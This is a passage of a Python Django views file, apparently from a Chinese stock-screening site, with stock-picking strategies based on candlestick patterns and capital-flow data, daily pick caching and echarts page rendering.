KmeansData.objects.filter(stock_date__range=(tradeday_3, tradeday_0)) # 获取特定4个交易日的所有股票\n judge_3 = stocks.filter(stock_date=tradeday_3).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第4个交易日的股票代码,开盘价,收盘价\n stock_id_list3 = [s[0] for s in judge_3 if float(s[1]) > float(s[2])] # 倒数第4日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_2 = stocks.filter(stock_id__in=stock_id_list3, stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第3个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第3日绿色股票代码\n judge_1 = stocks.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第2日交易日股票数据\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红色股票代码\n judge_0 = stocks.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第1日股票数据\n stocks_0 = [s for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票\n stocks_0 = sorted(stocks_0, key=lambda s: float(s[1]) - float(s[2]))\n stocks_choose = stocks_0[:10]\n stock_id_choose = [s[0] for s in stocks_choose]\n\n return stock_id_choose\n\n\n# kmeans 的 session3函数,利用自建的数据表KStockList来存取昨日与今日的股票数据,更新状态\ndef kmeans_session3(request):\n now = datetime.now() # 获取实时时间\n index_day = 1\n try:\n stock_kid_yes = KStockList.objects.get(pk=1)\n except Exception:\n stock_kid_yes = KStockList.objects.get_or_create(stock_kid_yes=KmeansStrategy2_1(index_day + 3),\n defaults={'pk': 1})\n stock_kid_yes = stock_kid_yes[0]\n stock_kid_yes = stock_kid_yes.stock_kid_yes\n if isinstance(stock_kid_yes, str):\n stock_kid_yes = eval(stock_kid_yes) # 如此将stock_kid_yes 变成list\n\n try:\n stock_kid_now = KStockList.objects.get(pk=2)\n except Exception:\n stock_kid_now = KStockList.objects.get_or_create(stock_kid_now=KmeansStrategy2_1(index_day + 2),\n defaults={'pk': 2}) # 实测, pk不能与1重复\n stock_kid_now = stock_kid_now[0]\n stock_kid_now = stock_kid_now.stock_kid_now\n if isinstance(stock_kid_now, str):\n stock_kid_now = eval(stock_kid_now)\n\n try:\n kflag = KStockList.objects.get(pk=3)\n except Exception:\n kflag = KStockList.objects.get_or_create(kflag=0, defaults={'pk': 3})\n kflag = kflag[0]\n kflag = int(kflag.kflag)\n\n # 以数据库的方式记录更新状态\n # count_knew = int(request.COOKIES.get('count_knew', False)) # 计算stock_id_new 被调用过几次\n if now.hour >= 16 and not kflag: # 这里count_new调用一次即可,若鲁棒性太差,可以设置为计数的方式,如count_new<5,当hour<17时,count_new=1\n stock_kid_new = KmeansStrategy2_1(index_day + 2)\n KStockList.objects.filter(pk=3).update(kflag=1)\n if stock_kid_now != stock_kid_new: # 如果不相等,说明数据有更新\n stock_kid_yes = stock_kid_now\n KStockList.objects.filter(pk=1).update(stock_kid_yes=stock_kid_yes)\n stock_kid_now = stock_kid_new\n KStockList.objects.filter(pk=2).update(stock_kid_now=stock_kid_now)\n if now.hour < 16 and kflag: # 自己点赞,颇为巧妙\n KStockList.objects.filter(pk=3).update(kflag=0)\n\n return stock_kid_yes, stock_kid_now\n\n\ndef KmeansStrategy4(index_day=5): # 寻找股市红三兵 跌/跌/涨/涨/涨,后面三天每天的涨幅低于3%\n (*_, tradeday_0, tradeday_1, tradeday_2, tradeday_3, tradeday_4) = KmeansData.objects.filter(\n stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 提取中国银行的倒数第5个交易日,作为所有股票的倒数第5个交易日,本行第一个数字为控制变量,默认且最小为5.\n stocks = KmeansData.objects.filter(stock_date__range=(tradeday_4, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_4 = stocks.filter(stock_date=tradeday_4).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第5个交易日的股票代码,开盘价,收盘价\n stock_id_list4 = [s[0] for s in 
judge_4 if float(s[1]) > float(s[2])] # 倒数第5日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_3 = stocks.filter(stock_id__in=stock_id_list4, stock_date=tradeday_3).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第4个交易日的股票代码,开盘价,收盘价\n stock_id_list3 = [s[0] for s in judge_3 if float(s[1]) > float(s[2])] # 倒数第4日绿色股票代码\n\n judge_2 = stocks.filter(stock_id__in=stock_id_list3, stock_date=tradeday_2).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第3日交易日股票数据\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) < float(s[2])] # 倒数第3日红色股票代码\n cstocks = CashFlowData.objects.filter(stock_id__in=stock_id_list2,\n stock_date__range=(tradeday_2, tradeday_0)) # 资金流的相关数据\n var_degree2 = cstocks.filter(stock_id__in=stock_id_list2, stock_date=tradeday_2).values_list('stock_id',\n 'var_degree')\n datas2 = [s for s in var_degree2 if s[1].endswith('%')]\n stock_id_list2 = [s[0] for s in datas2 if float(s[1][:-1]) < 11] # 涨幅小于1个百分点\n\n judge_1 = stocks.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第2日交易日股票数据\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红色股票代码\n var_degree1 = cstocks.filter(stock_id__in=stock_id_list1, stock_date=tradeday_1).values_list('stock_id',\n 'var_degree')\n datas1 = [s for s in var_degree1 if s[1].endswith('%')]\n stock_id_list1 = [s[0] for s in datas1 if float(s[1][:-1]) < 21]\n\n judge_0 = stocks.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id', 'price_open',\n 'price_close') # 倒数第1日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n var_degree0 = cstocks.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n 'var_degree')\n datas0 = [s for s in var_degree0 if s[1].endswith('%')]\n stock_id_list0 = [s[0] for s in datas0 if float(s[1][:-1]) < 31]\n\n # 股票当日涨跌幅小于特定值\n # var_degree = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n # 'var_degree')\n # var_degree = [s for s in var_degree if s[1].endswith('%')] # 股票的涨跌幅存在\n # stock_id_list0 = [s[0] for s in var_degree if float(s[1][:-1]) < 3] # 涨跌幅小于特定数值\n\n # 按照主力参与程度进行排序\n cstocks_join = CashFlowData.objects.filter(stock_id__in=stock_id_list0,\n stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n cdatas0 = cstocks_join.values_list('stock_id', 'join_degree')\n cdatas1 = defaultdict(list)\n for k, v in cdatas0:\n cdatas1[k].append(float(v[:-1]))\n\n cdatas2 = [(k, cdatas1[k][1] - cdatas1[k][0]) for k in cdatas1 if\n len(cdatas1[k]) == 2 and cdatas1[k][1] - cdatas1[k][0] > 0]\n cdatas2_sort = sorted(cdatas2, key=lambda s: s[1], reverse=True)\n cdatas3 = cdatas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in cdatas3]\n\n # stock_id = stock_id_list0\n\n return stock_id\n\n\n# @cache_page(60 * 15)\ndef k_means(request):\n visitcount(request)\n kdata_dated = KmeansData.objects.filter(stock_date__lte=day_fixed_before_kdata) # 筛选出过时数据\n kdata_dated.delete() # 删除\n\n context_dict = {} # 上下文字典\n\n now = datetime.now() # 获取实时时间\n\n workday = [0, 1, 2, 3, 4] # 星期一至星期五\n if (now.weekday() in workday) and (15 <= now.hour < 17): # 工作日的15:00-16:00之间\n context_dict['time_blank'] = '17点后更新'\n # count_knew = 0\n else:\n index_day = 1 # 最小值为1, 代表最新的一天\n\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n stocks_var = CashFlowData.objects.filter(stock_date=tradeday_0)\n # 
data_var_degree = stocks_var.values_list('var_degree', flat=True)\n # count_float = (float(x[:-1]) if x.endswith('%') else 0 for x in data_var_degree)\n # count_rise = len([x for x in count_float if x > 0])\n # print('the number of rise stocks:', count_rise) # 所有print中的数据改成英文\n # print('total stocks:', stocks_var.count())\n # print('the ratio of rise stocks:', count_rise / stocks_var.count())\n\n stock_id_list = KmeansStrategy3_1(index_day + 2) # 获取符合选股策略的股票代码, 见上面的函数\n stock_id_list_yes = KmeansStrategy3_1(index_day + 3)\n # stock_id_list = KmeansStrategy4(index_day + 4)\n # stock_id_list_yes = KmeansStrategy4(index_day + 5)\n # stock_id_list_yes = reverse_kmeans(index_day + 3)\n context_dict['trade_day'] = tradeday_0 # 交易日,用在模板的表格中\n\n # stock_id = kmeans_session3(request) # session函数\n # stock_id_list = stock_id[1]\n # stock_id_list_yes = stock_id[0] # 前一天,用来回测数据\n # count_knew = stock_id[2] # 从session函数返回的count_new,记录stock_kid_now与stock_kid_new是否相等的状态\n\n stocks_yes = stock_yes_test(stock_id_list_yes, index_day)\n\n if stocks_yes:\n context_dict['stocks_yes'] = stocks_yes[0]\n context_dict['average_var'] = stocks_yes[1]\n context_dict['average_count'] = stocks_yes[2]\n context_dict['stocks'] = ChangeToEchartsData_kdata(stock_id_list) # 将选择出的股票转换为符合echarts的数据结构,常规模式\n\n # context_dict['stocks'] = ChangeToEchartsData() # 单独调试\n\n response = render(request, 'choose_stock/k_means.html', context_dict)\n # expire_day = cookie_expire_time(16) # 每天的16时为cookie的更新时间\n # response.set_cookie('count_knew', count_knew, expires=expire_day)\n # response.set_cookie('count_knew', count_knew, max_age=1) # 10分���后cookie到期\n\n return response\n\n\n# -----------------------------中线布局相关----------------------------------\ndef K_middle_Strategy(index_day=2): # 按照高抛低吸的特点,结合历史数据,寻找K线图的低点.策略:最后两日略涨,最后1日的股价处于历史低点附近\n (*_, tradeday_0, tradeday_1) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行交易日日期数据,本行第一个数字为控制变量,默认且最小为2.\n stocks_1 = KmeansData.objects.filter(stock_date__range=(tradeday_1, tradeday_0)) # 获取特定2个交易日的所有股票\n judge_1 = stocks_1.filter(stock_date=tradeday_1).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红\n judge_0 = stocks_1.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第1个交易日的股票代码,开盘价,收盘价\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 去掉除权的股票(断崖式下跌的股票),\n stocks_var = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date__lte=tradeday_0).values_list(\n 'stock_id', 'var_degree')\n var_list = defaultdict(list)\n for k, v in stocks_var:\n if v.endswith('%'):\n var_list[k].append(float(v[:-1]))\n stock_id_list0 = [k for k in var_list if min(var_list[k]) > -10.5]\n\n # 股票当日涨跌幅小于特定值\n # var_degree = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n # 'var_degree')\n # var_degree = [s for s in var_degree if s[1].endswith('%')] # 股票的涨跌幅存在\n # stock_id_list0 = [s[0] for s in var_degree if float(s[1][:-1]) < 3] # 涨跌幅小于特定数值\n\n stocks = KmeansData.objects.filter(stock_id__in=stock_id_list0, stock_date__lte=tradeday_0).order_by('stock_date')\n kdatas0 = stocks.values_list('stock_id', 'price_low', 'price_high')\n kdatas1 = defaultdict(list)\n for k, v1, v2 in kdatas0:\n kdatas1[k].append((float(v1), float(v2)))\n\n kdatas2 = [(k, min(kdatas1[k])[0], 
max(kdatas1[k], key=lambda s: s[1])[1]) for k in kdatas1 if\n min(kdatas1[k])[0] > 0] # 提取每只股票的最低价,最高价,注意提取方法\n\n kdatas3 = []\n for item in kdatas2:\n stock_id = item[0]\n price_min = item[1]\n price_max = item[2]\n if price_max - price_min > 5: # 保证最大值与最小值的差不低于特定值,股票有上涨空间\n price_close = [s[2] for s in judge_0 if s[0] == stock_id][0]\n diff1 = float(price_close) - price_min # 收盘价与最低价的差\n diff2 = price_max - float(price_close) # 收盘价与最高价的差\n try:\n diff = diff1 / diff2 # 距离差比\n except Exception:\n continue\n kdatas3.append((stock_id, diff))\n\n kdatas3_sort = sorted(kdatas3, key=lambda s: s[1]) # 距离差比按照从小到大排列\n kdatas4 = kdatas3_sort[:10]\n stock_id = [s[0] for s in kdatas4]\n\n return stock_id\n\n\ndef k_middle(request):\n visitcount(request)\n context_dict = {} # 上下文字典\n\n now = datetime.now() # 获取实时时间\n\n workday = [0, 1, 2, 3, 4] # 星期一至星期五\n if (now.weekday() in workday) and (15 <= now.hour < 16): # 工作日的15:00-16:00之间\n context_dict['time_blank'] = '16点后更新'\n else:\n index_day = 1 # 最小值为1, 代表最新的一天\n\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n context_dict['trade_day'] = tradeday_0 # 交易日,用在模板的表格中\n\n stock_id_list = K_middle_Strategy(index_day + 1) # 获取符合选股策略的股票代码, 见上面的函数\n context_dict['stocks'] = ChangeToEchartsData_kdata(stock_id_list) # 将选择出的股票转换为符合echarts的数据结构,常规模式\n\n return render(request, 'choose_stock/k_middle.html', context_dict)\n\n\n# -----------------------------资金流相关函数---------------------------------\ndef ChangeToEchartsData_cdata(stock_id_list=['000705', '300016', '002090', '300110']):\n stocks = CashFlowData.objects.filter(stock_id__in=stock_id_list).order_by('stock_date')\n stock_seen = list({(stock.stock_id, stock.stock_name) for stock in stocks})\n # stock_seen = Name_Id.objects.filter(stock_id__in=stock_id_list).values_list('stock_id', 'stock_name')\n stocks_new = []\n for sid in stock_seen:\n stock = {} # 重构每支股票\n stock['stock_id'] = sid[0]\n stock['stock_name'] = sid[1]\n stock['stock_date'] = [str(s.stock_date) for s in stocks if s.stock_id == sid[0]]\n maincash_data = [s.maincash_in for s in stocks if s.stock_id == sid[0]]\n maincash_data_rise = [] # 资金净流入\n maincash_data_fall = [] # 资金净流出\n for eachdata in maincash_data:\n if not (eachdata.endswith('万') or eachdata.endswith('亿')):\n number = 0 # 如'-'或者小于1万的数据,全部近似处理为0\n elif eachdata.endswith('亿'):\n number = float(eachdata[:-1]) * 10 ** 4\n else:\n number = float(eachdata[:-1])\n # try:\n # unit = eachdata[-1] # 资金流数据单位,\"亿\"或者\"万\"\n # number = float(eachdata[:-1]) # 数字,字符串形式\n # except Exception as e:\n # print('switch number error:', e, sid)\n # number = 0\n # if unit == '亿':\n # number *= 10 ** 4\n if number > 0:\n maincash_data_rise.append(number)\n maincash_data_fall.append('-')\n else:\n maincash_data_rise.append('-')\n maincash_data_fall.append(number)\n stock['maincash_data_rise'] = maincash_data_rise\n rise_temp = [x for x in maincash_data_rise if isinstance(x, float)]\n stock['maincash_data_fall'] = maincash_data_fall\n fall_temp = [x for x in maincash_data_fall if isinstance(x, float)]\n try:\n stock['average_rise'] = sum(rise_temp) / len(rise_temp) # 净流入平均值\n stock['average_fall'] = sum(fall_temp) / len(fall_temp) # 净流出平均值\n # 主力净占比\n # maincash_rate = [float(s.maincash_in_rate[:-1]) for s in stocks if s.stock_id == sid[0]] # 单位为%, 比实际数大100倍\n except Exception as e:\n print('switch number or division error:', e, sid)\n # continue\n # maincash_rate = [float(s.maincash_in_rate[:-1]) for s in stocks if s.stock_id == 
sid[0]] # 单位为%, 比实际数大100倍\n maincash_rate = [s.maincash_in_rate for s in stocks if s.stock_id == sid[0]]\n maincash_rate = [float(s[:-1]) if s != '-' else 0 for s in\n maincash_rate] # 貌似此处当s=='-'是,s必须设为0,echarts的'line'图需要\n stock['maincash_rate'] = maincash_rate\n\n # 收盘价与主力成本\n stock['price_close'] = [float(s.price_close) for s in stocks if s.stock_id == sid[0]]\n main_cost = [s.main_cost for s in stocks if s.stock_id == sid[0]]\n stock['main_cost'] = [float(s) if s else '-' for s in main_cost] # 列表解析,带else的,要写前面\n\n # 机构参与度和控盘类型\n join_degree = (s.join_degree for s in stocks if s.stock_id == sid[0])\n stock['join_degree'] = [float(s[:-1]) if s else '-' for s in join_degree] # 空白时替换为'-'号,不然echarts这贱人会犯莫名其妙的错误\n control_type = [s.control_type for s in stocks if s.stock_id == sid[0]]\n stock['control_type'] = [s if s else '-' for s in control_type]\n\n stocks_new.append(stock)\n return stocks_new\n\n\ndef CashFlowStrategy1(index_day=1): # 策略1: 最后一天净流入,大于平均值,(收盘价-成本价)从小到大排列10个\n (*_, tradeday_0) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为1\n stocks = CashFlowData.objects.filter(stock_date__lte=tradeday_0).order_by('stock_date')\n id_maincash = stocks.values_list('stock_id', 'maincash_in')\n id_maincash2 = defaultdict(list) # 初始化字典\n for k, v in id_maincash:\n id_maincash2[k].append(v)\n\n stock_id1 = [] # 储存最后一天主力资金净流入大于净流入平均值的股票代码\n for k in id_maincash2:\n k_maincash = id_maincash2[k]\n pos_maincash = [x for x in k_maincash if not x.startswith('-')] # 去掉以'-'开头的maincash\n try:\n float_maincash = [float(x[:-1]) if x[-1] == '万' else float(x[:-1]) * 10 ** 4 for x in\n pos_maincash] # 转换为浮点数\n average_maincash = sum(float_maincash) / len(float_maincash)\n if k_maincash[-1][-1] == '万':\n last_maincash = float(k_maincash[-1][:-1])\n else:\n last_maincash = float(k_maincash[-1][:-1]) * 10 ** 4\n if last_maincash > average_maincash * 2: # 净流入大于1.5倍的平均值\n stock_id1.append(k)\n except Exception as e:\n print('switch number error:', e, k)\n continue\n\n stocks1 = stocks.filter(stock_id__in=stock_id1, stock_date=tradeday_0)\n judge1 = stocks1.values_list('stock_id', 'price_close', 'main_cost')\n sorted_judge = sorted(judge1, key=lambda s: float(s[1]) - float(s[2])) # 以(收盘价-开盘价)又小到大排序\n stocks_id2 = sorted_judge[:20] # 前特定数量的股票,不足也行\n stocks_id2_1 = [s[0] for s in stocks_id2] # 取出股票代码\n return stocks_id2_1\n\n\ndef CashFlowStrategy2(index_day=1): # 策略2: 最后一天净流入,大于平均值,前三次净流入均小于平均值,(收盘价-成本价)从小到大排列10个\n (*_, tradeday_0) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为1\n stocks = CashFlowData.objects.filter(stock_date__lte=tradeday_0).order_by('stock_date')\n # test_id = ['002647', '603519', '600228', '002587', '002762', '002569', '300284', '002379']\n # stocks = CashFlowData.objects.filter(stock_id__in=test_id, stock_date__lte=tradeday_0).order_by('stock_date')\n id_maincash = stocks.values_list('stock_id', 'maincash_in')\n id_maincash2 = defaultdict(list) # 初始化字典\n for k, v in id_maincash:\n id_maincash2[k].append(v)\n\n stock_id1 = [] # 储存最后一天主力资金净流入大于净流入平均值的股票代码\n for k in id_maincash2:\n\n # 下面三行代码放在此处严重影响性能, 尽量不要在循环中去不停地访问数据库\n # k_other_data = stocks.filter(stock_id=k).values_list('price_close', 'main_cost') # 取得股票的收盘价与主力成本价\n # if not (k_other_data.last()[0] and k_other_data.last()[1]): # 如果最后一天的收盘价或者主力成本不存在,则过滤掉该函数\n # continue\n k_maincash = id_maincash2[k]\n pos_maincash = [x for x in k_maincash if not x.startswith('-')] # 
去掉以'-'开头的maincash\n if not pos_maincash: # 去掉查询的最后一天无主力资金净流入数据的空股票,需不需要加pos_maincash[-1]\n continue\n elif not pos_maincash[-1]:\n continue\n if not (pos_maincash[-1].endswith('万') or pos_maincash[-1].endswith('亿')): # 去掉万以下的数据\n continue\n\n try:\n float_maincash = [float(x[:-1]) if x[-1] == '万' else float(x[:-1]) * 10 ** 4 for x in\n pos_maincash] # 转换为浮点数\n average_maincash = sum(float_maincash) / len(float_maincash)\n\n if float_maincash[-2] < average_maincash and float_maincash[-3] < average_maincash and float_maincash[\n -4] < average_maincash:\n ave3_less = True\n else:\n ave3_less = False\n continue\n\n if k_maincash[-1][-1] == '万':\n last_maincash = float(k_maincash[-1][:-1])\n else:\n last_maincash = float(k_maincash[-1][:-1]) * 10 ** 4\n\n if last_maincash > average_maincash * 2 and ave3_less and last_maincash > 1000: # 净流入大于特定倍数的平均值, 大于1000(判定为热门股票)\n k_other_data = stocks.filter(stock_id=k).values_list('price_close', 'main_cost',\n 'var_degree') # 取得股票的收盘价与主力成本价\n if not (k_other_data.last()[0] and k_other_data.last()[1] and k_other_data.last()[\n 2] != '-'): # 如果最后一天的收盘价或者主力成本不存在,或者涨跌幅为'-',则过滤掉该函数\n continue\n else:\n stock_id1.append(k)\n except Exception as e:\n print('switch number error:', e, k)\n continue\n\n stocks1 = stocks.filter(stock_id__in=stock_id1, stock_date=tradeday_0)\n judge1 = stocks1.values_list('stock_id', 'price_close', 'main_cost', 'var_degree')\n judge2 = [s for s in judge1 if\n float(s[1]) - float(s[2]) <= 0.1 and float(s[3][:-1]) < 9.8] # 收盘价-主力成本<=0.1 并且当天涨幅<9.8%\n sorted_judge = sorted(judge2, key=lambda s: float(s[1]) - float(s[2])) # 以(收盘价-开盘价)由小到大排序\n stocks_id2 = sorted_judge[:20] # 前特定数量的股票,不足也行\n stocks_id2_1 = [s[0] for s in stocks_id2] # 取出股票代码\n return stocks_id2_1\n\n\ndef stock_yes_test(stock_list_yes, index_day):\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n stocks_all_yes = CashFlowData.objects.filter(stock_date=tradeday_0) # 采用了CashFlowDat的数据库,所以最好每日17点后更新\n data_var_degree = stocks_all_yes.values_list('var_degree', flat=True)\n sorted_var_degree = sorted((float(x[:-1]) if x.endswith('%') else 0 for x in data_var_degree),\n reverse=True) # 将涨跌幅按照从小到大排序\n data_yes = stocks_all_yes.filter(stock_id__in=stock_list_yes).values('stock_id', 'stock_name',\n 'var_degree') # 特定股票数据\n stocks_yes = [] # 记录前一日的股票\n for eachdata in data_yes:\n each_var_degree = eachdata['var_degree']\n eachdata['var_degree'] = each_var_degree if each_var_degree.endswith('%') else '0%'\n vd = float(each_var_degree[:-1]) if each_var_degree.endswith('%') else 0 # 去掉百分号后的单支股票涨跌幅\n eachdata['vd'] = vd\n each_count = len([x for x in sorted_var_degree if x > vd]) + 1 # 每支股票的涨跌排名\n eachdata['var_count'] = each_count # 加入单支股票的字典中\n stocks_yes.append(eachdata)\n\n if stocks_yes:\n stocks_yes = sorted(stocks_yes, key=lambda x: x['vd'], reverse=True) # 将股票按照涨跌幅重新排序\n\n average_var = sum(x['vd'] for x in stocks_yes) / len(stocks_yes) # 股票的平均涨跌幅\n average_count = len([x for x in sorted_var_degree if x > average_var]) + 1 # 平均涨跌幅对应的涨跌排名\n average_var = '{:0.2f}'.format(average_var) + '%'\n\n return stocks_yes, average_var, average_count\n\n\n# capital 的 session3 函数\ndef capital_session3(request):\n now = datetime.now() # 获取实时时间\n index_day = 1\n try:\n stock_cid_yes = CStockList.objects.get(pk=1) # 运行速度快\n except Exception:\n stock_cid_yes = CStockList.objects.get_or_create(stock_cid_yes=CashFlowStrategy2(index_day + 1),\n defaults={'pk': 1}) # 运行速度慢,每次都要计算CashFlowStrategy2函数\n stock_cid_yes = 
stock_cid_yes[0]\n stock_cid_yes = stock_cid_yes.stock_cid_yes\n if isinstance(stock_cid_yes, str):\n stock_cid_yes = eval(stock_cid_yes) # 如此将stock_cid_yes 变成list\n\n try:\n stock_cid_now = CStockList.objects.get(pk=2)\n except Exception:\n stock_cid_now = CStockList.objects.get_or_create(stock_cid_now=CashFlowStrategy2(index_day), defaults={'pk': 2})\n stock_cid_now = stock_cid_now[0]\n stock_cid_now = stock_cid_now.stock_cid_now\n if isinstance(stock_cid_now, str):\n stock_cid_now = eval(stock_cid_now)\n\n try:\n cflag = CStockList.objects.get(pk=3)\n except Exception:\n cflag = CStockList.objects.get_or_create(cflag=0, defaults={'pk': 3})\n cflag = cflag[0]\n cflag = int(cflag.cflag)\n\n if now.hour >= 17 and not cflag:\n stock_cid_new = CashFlowStrategy2(index_day)\n CStockList.objects.filter(pk=3).update(cflag=1)\n if stock_cid_now != stock_cid_new: # 如果不相等,说明数据有更新\n stock_cid_yes = stock_cid_now\n CStockList.objects.filter(pk=1).update(stock_cid_yes=stock_cid_yes)\n stock_cid_now = stock_cid_new\n CStockList.objects.filter(pk=2).update(stock_cid_now=stock_cid_now)\n if now.hour < 17 and cflag: # 其余时间删除count_new的session\n CStockList.objects.filter(pk=3).update(cflag=0)\n\n return stock_cid_yes, stock_cid_now\n\n\ndef c_control_strategy(index_day): # 根据主力控盘,结合资金流的选股策略\n (*_, tradeday_0, tradeday_1) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为2\n stocks = CashFlowData.objects.filter(stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n stocks_yes = stocks.filter(Q(control_type='不控盘') | Q(control_type='轻度控盘'), stock_date=tradeday_1) # 注意此处使用了Q对象查询方法\n stock_id_yes = stocks_yes.values_list('stock_id', flat=True) # 获取昨日的股票代码\n\n # 去掉当天主力成本价远低于收盘价的股票\n # stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id', 'price_close',\n # 'main_cost')\n # stock_id_yes = [s[0] for s in stocks_t1 if float(s[1]) - float(s[2]) <= 0.5] # 收盘价-成本价小于: 0.1\n\n # 去掉当天主力净流入超过一定数额的股票\n stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id', 'maincash_in')\n stock_id_yes = [s[0] for s in stocks_t1 if not s[1].startswith('-')] # 取消主力净流出的股票\n\n stocks0 = stocks.filter(stock_id__in=stock_id_yes)\n datas0 = stocks0.values_list('stock_id', 'join_degree')\n datas1 = defaultdict(list)\n for k, v in datas0:\n datas1[k].append(float(v[:-1]))\n\n datas2 = [(k, datas1[k][1] - datas1[k][0]) for k in datas1 if len(datas1[k]) == 2]\n datas2_sort = sorted(datas2, key=lambda s: s[1], reverse=True)\n datas3 = datas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in datas3]\n\n print(stock_id)\n\n return stock_id\n\n\ndef c_control_strategy2(index_day): # 根据主力控盘,结合资金流的选股策略,当日主力净占比小于特定值\n (*_, tradeday_0, tradeday_1) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为2\n stocks = CashFlowData.objects.filter(stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n stocks_yes = stocks.filter(stock_date=tradeday_1).values_list('stock_id', 'maincash_in_rate')\n stocks_yes = [s for s in stocks_yes if s[1].endswith('%')]\n stock_id_yes = [s[0] for s in stocks_yes if float(s[1][:-1]) < -20] # 昨日主力净占比小于特定数值的股票代码\n\n # 去掉当天主力成本价远低于收盘价的股票\n # stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id', 'price_close',\n # 'main_cost')\n # stock_id_yes = [s[0] for s in stocks_t1 if float(s[1]) - float(s[2]) <= 0.5] # 收盘价-成本价小于: 
0.1\n\n # 选取当天主力净占比小于一定数额的股票\n stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id',\n 'maincash_in_rate')\n stocks_t1 = [s for s in stocks_t1 if s[1].endswith('%')]\n stock_id_yes = [s[0] for s in stocks_t1 if 0 < float(s[1][:-1]) < 5] # 当日主力净流入绝对值小于特定数值的股票\n\n stocks0 = stocks.filter(stock_id__in=stock_id_yes)\n datas0 = stocks0.values_list('stock_id', 'join_degree')\n datas1 = defaultdict(list)\n for k, v in datas0:\n datas1[k].append(float(v[:-1]))\n\n datas2 = [(k, datas1[k][1] - datas1[k][0]) for k in datas1 if len(datas1[k]) == 2]\n datas2_sort = sorted(datas2, key=lambda s: s[1], reverse=True)\n datas3 = datas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in datas3]\n\n print(stock_id)\n\n return stock_id\n\n\ndef c_middle_strategy(index_day=1): # 资金流中线选股策略,净流入资金占比最少,最后一天净流入\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 提取中国银行交易日日期数据,本行第一个数字为控制变量,默认且最小为1.\n stocks_0 = CashFlowData.objects.filter(stock_date=tradeday_0)\n judge_0 = stocks_0.values_list('stock_id', 'maincash_in')\n stock_id_list0 = [s[0] for s in judge_0 if not s[1].startswith('-')] # 去掉净流出的股票代码\n\n stocks = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date__lte=tradeday_0)\n datas0 = stocks.values_list('stock_id', 'maincash_in')\n datas1 = defaultdict(list)\n for k, v in datas0:\n if v != '-': # 去掉当天无净流入的数据\n datas1[k].append(v)\n\n datas2 = [] # 储存股票代码与占比数据\n for k in datas1:\n pos_maincash = [] # 储存净流入的股票数据\n neg_maincash = [] # 储存净流出的股票数据\n maincash_in = datas1[k]\n if len(maincash_in) < 64 - index_day: # 去掉各种新股,不连续的股票\n continue\n for each_cash in maincash_in:\n if each_cash.endswith('万'):\n 